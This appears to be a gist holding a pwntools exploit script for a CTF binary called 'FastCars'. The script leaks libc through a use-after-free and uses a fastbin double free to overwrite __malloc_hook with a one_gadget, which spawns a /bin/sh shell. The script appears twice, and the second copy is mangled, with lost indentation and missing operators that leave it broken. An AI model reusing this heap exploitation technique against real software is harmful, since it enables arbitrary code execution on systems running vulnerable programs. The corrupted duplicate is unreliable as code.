k1R4/exploit.py Secret

## exploit.py
from pwn import *

elf = ELF("./FastCars")
libc = ELF("./libc-2.23.so")
context.binary = elf
context.log_level = "debug"

p = process("./FastCars")
size2make = [0x0,0x18,0x68,0x1f8]

def alloc(size,data):
	p.sendlineafter("> ", "1")
	p.sendlineafter("> ", str(size2make.index(size)))
	p.sendlineafter("Car: ", data)
	p.recvuntil("Index: ")
	return int(p.recv(1))

def free(index):
	p.sendlineafter("> ", "2")
	p.sendlineafter("Index: ", str(index))

def leak(index):
	p.sendlineafter("> ", "3")
	p.sendlineafter("Index: ", str(index))
	p.recvuntil("Model:\n ")

# Leak libc using uaf
a = alloc(0x1f8,"AAA")
b = alloc(0x18,"X")
free(a)
leak(a)
libc.address = unpack(p.recv(6),48) - 0x3c4b78
log.info("Libc -> "+hex(libc.address))

# fake chunk located above __malloc_hook to write it with one_gadget
fake_chunk = libc.symbols["__malloc_hook"]-0x23
log.info("Fake Chunk -> "+hex(fake_chunk))

# 0xf1247 execve("/bin/sh", rsp+0x70, environ)
# constraints:
#   [rsp+0x70] == NULL
one_gadget = libc.address + 0xf1247
log.info("one_gadget -> "+hex(one_gadget))

# setup chunks for double free and fastbin attack
c = alloc(0x68,"")
d = alloc(0x68,"")
e = alloc(0x18,"")

# double free, avoid detection by freeing a chunk of same size in between
free(c)
free(d)
free(c)

# overwrite fd in double freed chunk to point to fake_chunk
f = alloc(0x68,p64(fake_chunk))
g = alloc(0x68,"")
h = alloc(0x68,"")
i = alloc(0x68,"X"*0x13+p64(one_gadget)+"\x00"*0x48) # put null bytes on stack to satisfy one_gadget

# trigger one_gadget
p.sendlineafter("> ", "1")
p.sendlineafter("> ", "1")

p.interactive()
	from pwn import *

	elf = ELF("./FastCars")
	libc = ELF("./libc-2.23.so")
	context.binary = elf
	context.log_level = "debug"

	p = process("./FastCars")
	size2make = [0x0,0x18,0x68,0x1f8]

	def alloc(size,data):
	p.sendlineafter("> ", "1")
	p.sendlineafter("> ", str(size2make.index(size)))
	p.sendlineafter("Car: ", data)
	p.recvuntil("Index: ")
	return int(p.recv(1))

	def free(index):
	p.sendlineafter("> ", "2")
	p.sendlineafter("Index: ", str(index))

	def leak(index):
	p.sendlineafter("> ", "3")
	p.sendlineafter("Index: ", str(index))
	p.recvuntil("Model:\n ")

	# Leak libc using uaf
	a = alloc(0x1f8,"AAA")
	b = alloc(0x18,"X")
	free(a)
	leak(a)
	libc.address = unpack(p.recv(6),48) - 0x3c4b78
	log.info("Libc -> "+hex(libc.address))

	# fake chunk located above __malloc_hook to write it with one_gadget
	fake_chunk = libc.symbols["__malloc_hook"]-0x23
	log.info("Fake Chunk -> "+hex(fake_chunk))

	# 0xf1247 execve("/bin/sh", rsp+0x70, environ)
	# constraints:
	# [rsp+0x70] == NULL
	one_gadget = libc.address + 0xf1247
	log.info("one_gadget -> "+hex(one_gadget))

	# setup chunks for double free and fastbin attack
	c = alloc(0x68,"")
	d = alloc(0x68,"")
	e = alloc(0x18,"")

	# double free, avoid detection by freeing a chunk of same size in between
	free(c)
	free(d)
	free(c)

	# overwrite fd in double freed chunk to point to fake_chunk
	f = alloc(0x68,p64(fake_chunk))
	g = alloc(0x68,"")
	h = alloc(0x68,"")
	i = alloc(0x68,"X"0x13+p64(one_gadget)+"\x00"0x48) # put null bytes on stack to satisfy one_gadget

	# trigger one_gadget
	p.sendlineafter("> ", "1")
	p.sendlineafter("> ", "1")

	p.interactive()